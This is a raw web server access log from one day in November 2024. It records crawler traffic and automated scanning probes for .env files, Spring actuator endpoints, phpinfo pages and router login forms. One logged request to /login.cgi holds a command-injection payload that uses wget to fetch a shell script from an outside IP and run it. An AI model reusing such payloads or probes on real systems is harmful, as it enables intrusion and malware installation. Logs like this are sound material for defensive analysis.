87.120.115.119 - - [24/Nov/2024:10:36:38 +0100] "GET /.env HTTP/1.1" 404 280 "-" "Mozilla/5.0 (Linux; Android 8.0.0; LND-AL30) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.89 Mobile Safari/537.36"
156.59.198.135 - - [24/Nov/2024:10:48:06 +0100] "GET /ed.activities.at/stats/lang/awstats-en.txt HTTP/1.0" 404 303 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
35.203.211.103 - - [24/Nov/2024:11:02:47 +0100] "GET / HTTP/1.1" 200 274 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
5.79.201.138 - - [24/Nov/2024:11:03:30 +0100] "GET / HTTP/1.0" 200 423 "http://triadian.castlegem.co.uk/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36 Herring/95.1.8810.11"
156.59.198.135 - - [24/Nov/2024:11:04:28 +0100] "GET /renault.activities.at/htdocs/binaries/10085151.pdf HTTP/1.0" 404 310 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [24/Nov/2024:11:11:57 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202110251403_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [24/Nov/2024:11:27:58 +0100] "GET /hausegger.activities.at/stats/lang/awstats-pt.txt HTTP/1.0" 404 308 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [24/Nov/2024:11:31:58 +0100] "GET /docs/ecommlogistics/belege/STORNORE16-000008.PDF HTTP/1.0" 404 311 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
185.130.44.88 - - [24/Nov/2024:11:53:06 +0100] "GET /env HTTP/1.1" 404 286 "-" "Mozilla/5.0 (Android 4.4; Mobile; rv:41.0) Gecko/41.0 Firefox/41.0"
185.130.44.88 - - [24/Nov/2024:11:53:06 +0100] "GET /actuator/env HTTP/1.1" 404 292 "-" "Mozilla/5.0 (Android 4.4; Mobile; rv:41.0) Gecko/41.0 Firefox/41.0"
185.130.44.88 - - [24/Nov/2024:11:53:06 +0100] "GET /gate;/env HTTP/1.1" 404 290 "-" "Mozilla/5.0 (Android 4.4; Mobile; rv:41.0) Gecko/41.0 Firefox/41.0"
185.130.44.88 - - [24/Nov/2024:11:53:09 +0100] "GET /api;/env HTTP/1.1" 404 290 "-" "Mozilla/5.0 (Android 4.4; Mobile; rv:41.0) Gecko/41.0 Firefox/41.0"
185.130.44.88 - - [24/Nov/2024:11:53:11 +0100] "GET /admin;/env HTTP/1.1" 404 291 "-" "Mozilla/5.0 (Android 4.4; Mobile; rv:41.0) Gecko/41.0 Firefox/41.0"
185.130.44.88 - - [24/Nov/2024:11:53:11 +0100] "GET /gateway;/env HTTP/1.1" 404 293 "-" "Mozilla/5.0 (Android 4.4; Mobile; rv:41.0) Gecko/41.0 Firefox/41.0"
185.130.44.88 - - [24/Nov/2024:11:53:12 +0100] "GET /gate;/actuator/env HTTP/1.1" 404 296 "-" "Mozilla/5.0 (Android 4.4; Mobile; rv:41.0) Gecko/41.0 Firefox/41.0"
185.130.44.88 - - [24/Nov/2024:11:53:15 +0100] "GET /api;/actuator/env HTTP/1.1" 404 296 "-" "Mozilla/5.0 (Android 4.4; Mobile; rv:41.0) Gecko/41.0 Firefox/41.0"
185.130.44.88 - - [24/Nov/2024:11:53:17 +0100] "GET /admin;/actuator/env HTTP/1.1" 404 297 "-" "Mozilla/5.0 (Android 4.4; Mobile; rv:41.0) Gecko/41.0 Firefox/41.0"
185.130.44.88 - - [24/Nov/2024:11:53:17 +0100] "GET /gateway;/actuator/env HTTP/1.1" 404 298 "-" "Mozilla/5.0 (Android 4.4; Mobile; rv:41.0) Gecko/41.0 Firefox/41.0"
34.78.115.191 - - [24/Nov/2024:12:15:51 +0100] "GET / HTTP/1.1" 200 274 "-" "python-requests/2.32.3"
156.59.198.136 - - [24/Nov/2024:12:16:12 +0100] "GET /ed.activities.at/stats/lang/awstats-mk.txt HTTP/1.0" 404 304 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [24/Nov/2024:12:20:13 +0100] "GET /ed.activities.at/stats/lang/awstats-ba.txt HTTP/1.0" 404 304 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
46.19.138.234 - - [24/Nov/2024:12:23:26 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
125.229.252.183 - - [24/Nov/2024:12:39:51 +0100] "GET / HTTP/1.0" 200 423 "-" "Mozilla/5.0 (Linux; U; Android 4.0.3; ko-kr; LG-L160L Build/IML74K) AppleWebkit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30"
156.59.198.135 - - [24/Nov/2024:12:50:04 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/201911291503_RenOrder.xml HTTP/1.0" 404 328 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
80.82.77.202 - - [24/Nov/2024:13:05:20 +0100] "GET / HTTP/1.0" 200 423 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063"
156.59.198.135 - - [24/Nov/2024:13:06:15 +0100] "GET /ed.activities.at/stats/lang/awstats-cn.txt HTTP/1.0" 404 304 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
185.191.126.248 - - [24/Nov/2024:13:08:13 +0100] "GET / HTTP/1.1" 200 423 "-" "-"
185.91.127.43 - - [24/Nov/2024:13:16:30 +0100] "CONNECT api.ip.pn:443 HTTP/1.1" 200 423 "-" "Mozilla/5.0"
156.59.198.136 - - [24/Nov/2024:13:22:17 +0100] "GET /docs/ecommlogistics/belege/GS16-000002.PDF HTTP/1.0" 404 306 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [24/Nov/2024:13:26:16 +0100] "GET /renault.activities.at/htdocs/binaries/10331571.pdf HTTP/1.0" 404 312 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
95.214.55.43 - - [24/Nov/2024:13:26:48 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
156.59.198.135 - - [24/Nov/2024:13:30:16 +0100] "GET /ed.activities.at/stats/lang/awstats-lv.txt HTTP/1.0" 404 304 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
34.38.246.117 - - [24/Nov/2024:13:46:12 +0100] "GET / HTTP/1.1" 200 274 "-" "python-requests/2.32.3"
156.59.198.135 - - [24/Nov/2024:13:46:18 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202005270903_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
47.128.63.57 - - [24/Nov/2024:13:48:40 +0100] "GET /robots.txt HTTP/1.1" 404 292 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [24/Nov/2024:13:50:18 +0100] "GET /renault.activities.at/htdocs/dompdf-master/www/test/images/png/gray8b_bk.png HTTP/1.0" 404 328 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
47.128.51.70 - - [24/Nov/2024:13:52:40 +0100] "GET /robots.txt HTTP/1.1" 404 292 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [24/Nov/2024:13:54:18 +0100] "GET /renault.activities.at/htdocs/pinEdit/editor/help/userhelp-Dateien/image135.jpg HTTP/1.0" 404 328 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
47.128.24.233 - - [24/Nov/2024:13:56:41 +0100] "GET /robots.txt HTTP/1.1" 404 292 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
47.128.117.79 - - [24/Nov/2024:14:00:40 +0100] "GET /robots.txt HTTP/1.1" 404 292 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [24/Nov/2024:14:06:59 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202009281603_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [24/Nov/2024:14:11:00 +0100] "GET /hausegger.activities.at/stats/lang/awstats-ro.txt HTTP/1.0" 404 308 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
95.214.55.79 - - [24/Nov/2024:14:17:14 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
179.43.191.98 - - [24/Nov/2024:14:32:02 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
194.50.16.198 - - [24/Nov/2024:14:36:03 +0100] "GET /login.asp HTTP/1.1" 404 354 "-" "-"
156.59.198.135 - - [24/Nov/2024:14:54:04 +0100] "GET /hausegger.activities.at/stats/lang/awstats-de.txt HTTP/1.0" 404 308 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [24/Nov/2024:15:01:43 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/201912021603_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
194.38.23.16 - - [24/Nov/2024:15:22:34 +0100] "GET /wp-content/plugins/mm-forms-community/includes/doajaxfileupload.php HTTP/1.1" 404 419 "-" "ALittle Client"
194.38.23.16 - - [24/Nov/2024:15:22:46 +0100] "GET /wp-content/plugins/mm-forms-community/includes/doajaxfileupload.php HTTP/1.1" 404 432 "-" "ALittle Client"
156.59.198.135 - - [24/Nov/2024:15:23:05 +0100] "GET /docs/ecommlogistics/belege/GS17-00002.PDF HTTP/1.0" 404 306 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
4.151.38.26 - - [24/Nov/2024:15:33:31 +0100] "GET /portal/redlion HTTP/1.1" 404 286 "-" "Mozilla/5.0 zgrab/0.x"
172.168.41.205 - - [24/Nov/2024:15:33:56 +0100] "GET /manager/text/list HTTP/1.1" 404 289 "-" "Mozilla/5.0 zgrab/0.x"
156.59.198.136 - - [24/Nov/2024:15:37:27 +0100] "GET /ed.activities.at/stats/lang/awstats-nn.txt HTTP/1.0" 404 303 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [24/Nov/2024:15:41:26 +0100] "GET /renault.activities.at/htdocs/binaries/10009028.pdf HTTP/1.0" 404 311 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [24/Nov/2024:15:57:28 +0100] "GET /renault.activities.at/htdocs/binaries/10052852.pdf HTTP/1.0" 404 311 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
178.161.214.197 - - [24/Nov/2024:16:02:26 +0100] "GET / HTTP/1.1" 200 423 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
194.50.16.198 - - [24/Nov/2024:16:04:56 +0100] "POST /boaform/admin/formLogin HTTP/1.1" 404 293 "http://212.69.160.11:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
92.255.57.58 - - [24/Nov/2024:16:06:38 +0100] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
156.59.198.136 - - [24/Nov/2024:16:06:44 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202108122003_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [24/Nov/2024:16:10:45 +0100] "GET /ed.activities.at/stats/lang/awstats-pl.txt HTTP/1.0" 404 304 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
114.33.241.140 - - [24/Nov/2024:16:13:53 +0100] "GET / HTTP/1.0" 200 423 "-" "Mozilla/5.0 (Linux; U; Android 4.0.3; ko-kr; LG-L160L Build/IML74K) AppleWebkit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30"
156.59.198.135 - - [24/Nov/2024:16:14:53 +0100] "GET /ed.activities.at/stats/lang/awstats-cy.txt HTTP/1.0" 404 304 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
216.244.66.229 - - [24/Nov/2024:16:20:26 +0100] "GET /robots.txt HTTP/1.1" 404 370 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
216.244.66.229 - - [24/Nov/2024:16:33:48 +0100] "GET /%7Eridersde/joomla/ HTTP/1.1" 404 377 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
156.59.198.135 - - [24/Nov/2024:16:38:28 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202005131503_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
185.130.44.88 - - [24/Nov/2024:16:44:32 +0100] "GET /admin/.env HTTP/1.1" 404 295 "-" "Mozilla/5.0 (Ubuntu; Linux x86_64; rv:127.0) Gecko/20100101 Firefox/127.0"
156.59.198.135 - - [24/Nov/2024:16:44:58 +0100] "GET /renault.activities.at/htdocs/pinEdit/editor/help/userhelp-Dateien/image022.jpg HTTP/1.0" 404 328 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [24/Nov/2024:16:48:58 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202005191703_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
185.208.156.160 - - [24/Nov/2024:16:49:15 +0100] "\x16\x03\x01" 400 383 "-" "-"
185.208.156.160 - - [24/Nov/2024:16:49:15 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.80 Safari/537.36"
80.75.212.9 - - [24/Nov/2024:16:51:39 +0100] "CONNECT api.ip.pn:443 HTTP/1.1" 200 423 "-" "Mozilla/5.0"
156.59.198.135 - - [24/Nov/2024:16:54:13 +0100] "GET /docs/ecommlogistics/belege/AB16-000015.pdf HTTP/1.0" 404 306 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
5.8.11.202 - - [24/Nov/2024:16:57:14 +0100] "GET / HTTP/1.0" 200 423 "-" "Googlebot-Image/1.0"
156.59.198.136 - - [24/Nov/2024:16:58:13 +0100] "GET /ed.activities.at/stats/lang/awstats-et.txt HTTP/1.0" 404 303 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [24/Nov/2024:17:02:13 +0100] "GET /renault.activities.at/htdocs/binaries/10009029.pdf HTTP/1.0" 404 311 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
185.242.226.10 - - [24/Nov/2024:17:06:01 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36"
47.128.124.112 - - [24/Nov/2024:17:06:13 +0100] "GET /robots.txt HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
185.130.44.88 - - [24/Nov/2024:17:09:23 +0100] "GET /test.php HTTP/1.1" 200 20 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:78.0) Gecko/20100101 Firefox/78.0"
185.130.44.88 - - [24/Nov/2024:17:09:26 +0100] "GET /php-info.php HTTP/1.1" 404 296 "-" "Mozilla/5.0 (Knoppix; Linux i686; rv:122.0) Gecko/20100101 Firefox/122.0"
185.130.44.88 - - [24/Nov/2024:17:09:28 +0100] "GET /linusadmin-phpinfo.php HTTP/1.1" 404 302 "-" "Mozilla/5.0 (Debian; Linux i686; rv:120.0) Gecko/20100101 Firefox/120.0"
185.130.44.88 - - [24/Nov/2024:17:09:28 +0100] "GET /dashboard/phpinfo.php HTTP/1.1" 404 302 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0"
154.213.184.43 - - [24/Nov/2024:17:12:31 +0100] "GET / HTTP/1.1" 200 423 "-" "-"
156.59.198.136 - - [24/Nov/2024:17:18:14 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/201912121703_RenOrder.xml HTTP/1.0" 404 328 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [24/Nov/2024:17:22:14 +0100] "GET /renault.activities.at/htdocs/binaries/10015817.pdf HTTP/1.0" 404 311 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
92.255.57.58 - - [24/Nov/2024:17:23:26 +0100] "GET /actuator/gateway/routes HTTP/1.1" 404 293 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
156.59.198.135 - - [24/Nov/2024:17:26:14 +0100] "GET /ed.activities.at/stats/lang/awstats-id.txt HTTP/1.0" 404 303 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
125.228.91.234 - - [24/Nov/2024:17:28:19 +0100] "GET / HTTP/1.0" 200 423 "-" "Mozilla/5.0 (Linux; U; Android 4.0.3; ko-kr; LG-L160L Build/IML74K) AppleWebkit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30"
47.128.60.143 - - [24/Nov/2024:17:34:15 +0100] "GET /robots.txt HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [24/Nov/2024:17:38:15 +0100] "GET /ed.activities.at/stats/lang/awstats-nl.txt HTTP/1.0" 404 304 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
47.128.44.172 - - [24/Nov/2024:17:42:15 +0100] "GET /robots.txt HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [24/Nov/2024:17:50:16 +0100] "GET /ed.activities.at/stats/lang/awstats-ua.txt HTTP/1.0" 404 304 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
47.128.125.12 - - [24/Nov/2024:17:54:17 +0100] "GET /robots.txt HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [24/Nov/2024:17:58:16 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202101181403_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
92.255.57.58 - - [24/Nov/2024:17:59:44 +0100] "\x16\x03\x01\x05\xa8\x01" 400 383 "-" "-"
141.98.7.248 - - [24/Nov/2024:18:02:28 +0100] "CONNECT 1.1.1.1:443 HTTP/1.1" 200 423 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36"
141.98.7.248 - - [24/Nov/2024:18:02:29 +0100] "CONNECT 1.1.1.1:443 HTTP/1.1" 200 423 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36"
141.98.7.248 - - [24/Nov/2024:18:02:30 +0100] "CONNECT 1.1.1.1:443 HTTP/1.1" 200 423 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36"
156.59.198.136 - - [24/Nov/2024:18:10:17 +0100] "GET /renault.activities.at/htdocs/binaries/10004867.pdf HTTP/1.0" 404 311 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [24/Nov/2024:18:14:17 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202010071603_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [24/Nov/2024:18:18:17 +0100] "GET /ed.activities.at/stats/lang/awstats-jp.txt HTTP/1.0" 404 304 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [24/Nov/2024:18:22:17 +0100] "GET /hausegger.activities.at/stats/lang/awstats-se.txt HTTP/1.0" 404 308 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
93.174.93.12 - - [24/Nov/2024:18:23:45 +0100] "\x16\x03\x02\x01o\x01" 400 383 "-" "-"
156.59.198.135 - - [24/Nov/2024:18:34:18 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/201910171303_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
37.139.5.66 - - [24/Nov/2024:18:51:45 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://193.35.18.164/klausschwab.sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 296 "-" "linus-torvalds-loves-you"
156.59.198.136 - - [24/Nov/2024:19:05:35 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202012091503_RenOrder.xml HTTP/1.0" 404 328 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
194.50.16.198 - - [24/Nov/2024:19:13:50 +0100] "GET / HTTP/1.1" 200 423 "-" "Linux Gnu (cow)"
194.50.16.198 - - [24/Nov/2024:19:50:51 +0100] "GET /cgi-bin/index.cgi HTTP/1.1" 404 362 "-" "-"
179.43.191.98 - - [24/Nov/2024:19:53:38 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
156.59.198.135 - - [24/Nov/2024:19:57:10 +0100] "GET /ed-test.2web.at/stats/lang/awstats-id.txt HTTP/1.0" 404 302 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [24/Nov/2024:20:01:10 +0100] "GET /renault.activities.at/htdocs/binaries/10449712.doc HTTP/1.0" 404 312 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
5.8.11.202 - - [24/Nov/2024:20:01:42 +0100] "GET / HTTP/1.0" 200 423 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0)"
